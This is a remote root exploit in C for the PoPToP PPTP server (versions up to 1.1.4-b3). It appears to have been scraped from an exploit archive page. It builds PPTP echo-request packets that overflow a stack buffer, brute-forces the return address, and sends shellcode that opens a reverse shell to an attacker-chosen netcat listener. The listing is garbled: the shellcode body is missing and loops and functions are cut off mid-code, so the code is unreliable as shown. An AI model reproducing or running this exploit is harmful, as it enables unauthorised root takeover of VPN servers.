PoPToP PPTP server <= 1.1.4-b3 remote root Exploit

                              * Version TXT Disponible ici *

                              *  exploit for a recently discovered vulnerability in PoPToP
                              *  PPTP server under Linux. Versions affected are all prior to
                              *  1.1.4-b3 and 1.1.3-20030409.
                              *  The exploit is capable of bruteforcing the RET address to find our
                              *  buffer in the stack. Upon a successfull run it brings up a reverse
                              *  shell with privileges of the pptpd daemon (typically root)
                              *  on the victim server.

                              #define u_int8_t char
                              #define u_int16_t WORD
                              #define u_int32_t DWORD

                              char shellcode[] =


                              "\x01\x01" // port


                              "\x01\x01\x01\x01" // ip address


                              struct pptp_header {
                              u_int16_t length;               /* pptp message length incl header */
                              u_int16_t pptp_type;            /* pptp message type */
                              u_int32_t magic;                /* magic cookie */
                              u_int16_t ctrl_type;            /* control message type */
                              u_int16_t reserved0;            /* reserved */

                              #define MAX_HOSTNAME_SIZE               64
                              #define MAX_VENDOR_SIZE                 64
                              #define PPTP_VERSION                    0x0100

                              struct pptp_start_ctrl_conn_rqst {
                              struct pptp_header header;      /* pptp header */
                              u_int16_t version;              /* pptp protocol version */
                              u_int16_t reserved1;            /* reserved */
                              u_int32_t framing_cap;          /* framing capabilities */
                              u_int32_t bearer_cap;           /* bearer capabilities */
                              u_int16_t max_channels;         /* maximum channels */
                              u_int16_t firmware_rev;         /* firmware revision */
                              u_int8_t hostname[MAX_HOSTNAME_SIZE];   /* hostname */
                              u_int8_t vendor[MAX_VENDOR_SIZE];       /* vendor */

                              struct pptp_echo_rqst {
                              struct pptp_header header;      /* header */
                              u_int32_t identifier;           /* value to match rply with rqst */
                                char buf[10000];

                              struct pptp_reply {
                              struct pptp_header header;      /* header */
                                char buf[10000];

                              /* Magic Cookie */
                              #define PPTP_MAGIC_COOKIE               0x1a2b3c4d

                              /* Message types */
                              #define PPTP_CTRL_MESSAGE               1

                              /* Control Connection Management */
                              #define START_CTRL_CONN_RQST            1
                              #define START_CTRL_CONN_RPLY            2
                              #define STOP_CTRL_CONN_RQST             3
                              #define STOP_CTRL_CONN_RPLY             4
                              #define ECHO_RQST                       5
                              #define ECHO_RPLY                       6

                              // brute force values
                              #define TOPOFSTACK 0xbfffffff
                              #define BOTTOMOFSTACK 0xbf000000
                              #define STEP 50

                              void send_init_request(SOCKET st)
                              pptp_start_ctrl_conn_rqst request;
                              request.header.magic = htonl(PPTP_MAGIC_COOKIE);
                              request.header.pptp_type = htons(PPTP_CTRL_MESSAGE);
                              request.header.ctrl_type = htons(START_CTRL_CONN_RQST);

                              request.version = PPTP_VERSION;
                              request.framing_cap = 0;
                              request.bearer_cap = 0;
                              request.max_channels = 1;
                              request.firmware_rev = 0;
                              strcpy(request.vendor,"domain HELL");
                              request.header.length = ntohs(sizeof(request));



                              void send_ping_overflow(SOCKET st,DWORD ret,char* hostname,short port)
                              pptp_echo_rqst ping;
                              ping.header.magic = htonl(PPTP_MAGIC_COOKIE);
                              ping.header.pptp_type = htons(PPTP_CTRL_MESSAGE);
                              ping.header.ctrl_type = htons(ECHO_RQST);
                              ping.identifier = 111;

                              ping.header.length = ntohs(1);


                              int buflen = 500;
                              for (int i=0;i [] [] []\n\n",argv[0]);
                              printf("     is the ip address or hostname of the PoPToP server\n");
                              printf("      you want to attack.  Port 1723 is used for connection\n");
                              printf("     and  - specify an ip address to which\n");
                              printf("      a connection is possible to port  and set up a\n");
                              printf("      netcat listener. You'll get a reverse shell.\n");
                              printf("     is a delay between stack bruteforce attemts, in milliseconds\n");
                              printf("   If you only pass a single parameter, the program will check\n");
                              printf("   whether remote server is vulnerable or not. Otherwise it will\n");
                              printf("   perform a ret bruteforce.\n");
                              printf("usage examples:\n");
                              printf("  %s 5555\n",argv[0]);
                              printf("    attack and get a reverse shell on port 5555\n");
                              printf("  %s 6666 100\n",argv[0]);
                              printf("    attack a locally running pptpd with a timeout of 100 ms\n");
                              printf("    and get a shell on port 6666.\n");
                              printf("  %s\n",argv[0]);
                              printf("    check if the PoPToP server on is vulnerable.\n");
                              return 0;

                              int timeout = 500;
                              if (argc >= 5) timeout = atoi(argv[4]);

                              // init winsock
                              WORD version=0x0101;
                              WSADATA data;

                              DWORD ret;
                              if (argc == 2)
                              if (!connect_server(argv[1])) return 1;

                              printf("\nChecking if the server is vulnerable..\n");
                              printf("(if it is you have to wait 65 seconds)..\n");

                              ret = 0x01010101;
                              int bytes;
                              pptp_reply reply;

                              //header length
                              bytes = recv(st,(char*)&reply,2,0);
                              bytes = ntohs(reply.header.length);
                              bytes = recv(st,(char*)&reply+2,bytes-2,0);
                              int j = htons(reply.header.ctrl_type);

                              //header length
                              bytes = recv(st,(char*)&reply,2,0);
                              printf("PoPToP server is ");
                              if (bytes != SOCKET_ERROR) printf("vulnerable!\n");
                              else printf("not vulnerable\n");

                              return 1;

                              printf("[!] Attempting bruteforce against %s\n",argv[1]);
                              printf("interrupt when you get a shell to %s on port %d...\n\n",argv[2],atoi(argv[3]));

                              int checked = 0;

                              for (ret = TOPOFSTACK; ret >=BOTTOMOFSTACK; ret -= STEP)
                              printf("[*] ");
                              if (!connect_server(argv[1])) return 1;
                              printf("sending payload..");

                              // initial packet

                              //a real overflowing ping packet



                              return 0;



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